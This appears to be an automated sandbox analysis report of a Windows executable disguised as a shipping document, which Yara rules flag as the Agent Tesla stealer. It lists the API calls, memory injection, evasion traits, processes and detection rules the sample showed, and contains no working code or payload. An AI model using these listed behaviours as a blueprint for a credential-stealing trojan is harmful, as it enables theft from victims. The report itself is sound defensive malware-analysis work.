Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlH

Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040703E OpenClipboard,		0_2_0040703E
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0040703E OpenClipboard,		0_2_0040703E

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043258C GetClipboardData,GlobalFix,GlobalUnWire,		0_2_0043258C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043258C GetClipboardData,GlobalFix,GlobalUnWire,		0_2_0043258C

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0045BDA0 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,		0_2_0045BDA0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0045BDA0 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,		0_2_0045BDA0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!

Yara detected Agent Tesla Trojan

Show sources

Source: Yara match	File source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: Original Shipment Document.exe
Source: initial sample	Static PE information: Filename: Original Shipment Document.exe

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00457E74 NtdllDefWindowProc_A,	0_2_00457E74
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0042E8BC NtdllDefWindowProc_A,	0_2_0042E8BC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0044CA64 GetSubMenu,SaveDC,RestoreDC,7378B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_0044CA64
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043CE20 NtdllDefWindowProc_A,GetCapture,	0_2_0043CE20
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00457E74 NtdllDefWindowProc_A,	0_2_00457E74
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0042E8BC NtdllDefWindowProc_A,	0_2_0042E8BC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0044CA64 GetSubMenu,SaveDC,RestoreDC,7378B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_0044CA64
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043CE20 NtdllDefWindowProc_A,GetCapture,	0_2_0043CE20
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342A10 NtProtectVirtualMemory,	1_2_02342A10
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340F8C NtWriteVirtualMemory,	1_2_02340F8C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02340F5E NtWriteVirtualMemory,	1_2_02340F5E
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341167 NtWriteVirtualMemory,	1_2_02341167
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00561471 NtProtectVirtualMemory,	4_2_00561471
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00560D7C CreateThread,TerminateThread,NtProtectVirtualMemory,	4_2_00560D7C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562A10 NtProtectVirtualMemory,	4_2_00562A10
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00560DCE LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,NtProtectVirtualMemory,	4_2_00560DCE
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_005613FD Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	4_2_005613FD
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562D90 NtSetInformationThread,	4_2_00562D90
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_0056146B NtProtectVirtualMemory,	4_2_0056146B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_0056032B NtProtectVirtualMemory,	4_2_0056032B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562DCC NtSetInformationThread,	4_2_00562DCC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562D96 NtSetInformationThread,	4_2_00562D96
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_00452159 NtCreateSection,	12_2_00452159
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_05370476 NtQuerySystemInformation,	12_2_05370476
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_05370445 NtQuerySystemInformation,	12_2_05370445

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00452548	0_2_00452548
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0044CA64	0_2_0044CA64
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00452548	0_2_00452548
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0044CA64	0_2_0044CA64
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_004015DC	1_2_004015DC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401E1B	1_2_00401E1B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401E60	1_2_00401E60
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401ECA	1_2_00401ECA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401ED1	1_2_00401ED1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401ED4	1_2_00401ED4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401EDC	1_2_00401EDC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401EE8	1_2_00401EE8
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401EF0	1_2_00401EF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401EF9	1_2_00401EF9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401EA6	1_2_00401EA6
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401F05	1_2_00401F05
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401F08	1_2_00401F08
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401F10	1_2_00401F10
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_00401F18	1_2_00401F18
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02341534	1_2_02341534
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_004015DC	1_1_004015DC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401E1B	1_1_00401E1B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401E60	1_1_00401E60
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401ECA	1_1_00401ECA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401ED1	1_1_00401ED1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401ED4	1_1_00401ED4
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401EDC	1_1_00401EDC
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401EE8	1_1_00401EE8
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401EF0	1_1_00401EF0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401EF9	1_1_00401EF9
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401EA6	1_1_00401EA6
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401F05	1_1_00401F05
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401F08	1_1_00401F08
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401F10	1_1_00401F10
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_1_00401F18	1_1_00401F18
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0044B976	12_2_0044B976
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_0045113D	12_2_0045113D
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFD342	12_2_04CFD342
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFE897	12_2_04CFE897
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFF459	12_2_04CFF459
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFE20F	12_2_04CFE20F
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFCF0F	12_2_04CFCF0F
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFE92B	12_2_04CFE92B
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFF928	12_2_04CFF928
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_04CFF938	12_2_04CFF938

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: String function: 00403980 appears 32 times
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: String function: 00404320 appears 75 times
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: String function: 00403980 appears 32 times
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: String function: 00404320 appears 75 times

Source: Original Shipment Document.exe, 00000000.00000002.234335175.0000000002230000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000000.00000002.234491928.000000000251C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameThermolum.exe vs Original Shipment Document.exe
Source: Original Shipment Document.exe	Binary or memory string: OriginalFilename vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameThermolum.exe vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000002.273393170.0000000002200000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameThermolum.exeFE2XRibbon Turbino$ vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000002.273413707.0000000002320000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332447123.000000001EE80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332467489.000000001EFD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameYLUNSZCIEWYCHRDUHOLIFUNMQVZGKYTSCPZZKDHF_20190607180258786.exe4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332541744.000000001F2C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe	Binary or memory string: OriginalFilename vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505506746.00000000056F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYLUNSZCIEWYCHRDUHOLIFUNMQVZGKYTSCPZZKDHF_20190607180258786.exe4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505299196.0000000005330000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.504152490.0000000002C20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505566735.0000000005760000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505634471.0000000005990000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000000.00000002.234335175.0000000002230000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000000.00000002.234491928.000000000251C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameThermolum.exe vs Original Shipment Document.exe
Source: Original Shipment Document.exe	Binary or memory string: OriginalFilename vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameThermolum.exe vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000002.273393170.0000000002200000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameThermolum.exeFE2XRibbon Turbino$ vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000001.00000002.273413707.0000000002320000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332447123.000000001EE80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332467489.000000001EFD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameYLUNSZCIEWYCHRDUHOLIFUNMQVZGKYTSCPZZKDHF_20190607180258786.exe4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 00000004.00000002.332541744.000000001F2C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Original Shipment Document.exe
Source: Original Shipment Document.exe	Binary or memory string: OriginalFilename vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505506746.00000000056F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYLUNSZCIEWYCHRDUHOLIFUNMQVZGKYTSCPZZKDHF_20190607180258786.exe4 vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505299196.0000000005330000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.504152490.0000000002C20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505566735.0000000005760000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Original Shipment Document.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505634471.0000000005990000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs Original Shipment Document.exe

Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a, version = stealer
Source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a, version = stealer
Source: 0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a, version = stealer
Source: Process Memory Space: Original Shipment Document.exe PID: 1848, type: MEMORY	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a, version = stealer

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/0@3/2

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00420594 GetLastError,FormatMessageA,		0_2_00420594
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00420594 GetLastError,FormatMessageA,		0_2_00420594

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_053702FA AdjustTokenPrivileges,	12_2_053702FA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_053702C3 AdjustTokenPrivileges,	12_2_053702C3
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_053702FA AdjustTokenPrivileges,	12_2_053702FA
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_053702C3 AdjustTokenPrivileges,	12_2_053702C3

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408B02 GetDiskFreeSpaceA,		0_2_00408B02
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408B02 GetDiskFreeSpaceA,		0_2_00408B02

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00416D64 FindResourceA,LoadResource,SizeofResource,LockResource,		0_2_00416D64
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00416D64 FindResourceA,LoadResource,SizeofResource,LockResource,		0_2_00416D64

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File created: C:\Users\user\AppData\Local\Temp\~DFBEC6A87608955887.TMP			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File created: C:\Users\user\AppData\Local\Temp\~DFBEC6A87608955887.TMP			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Original Shipment Document.exe	Virustotal: Detection: 31%
Source: Original Shipment Document.exe	Virustotal: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process created: C:\Users\user\Desktop\Original Shipment Document.exe 'C:\Users\user\Desktop\Original Shipment Document.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32			Jump to behavior
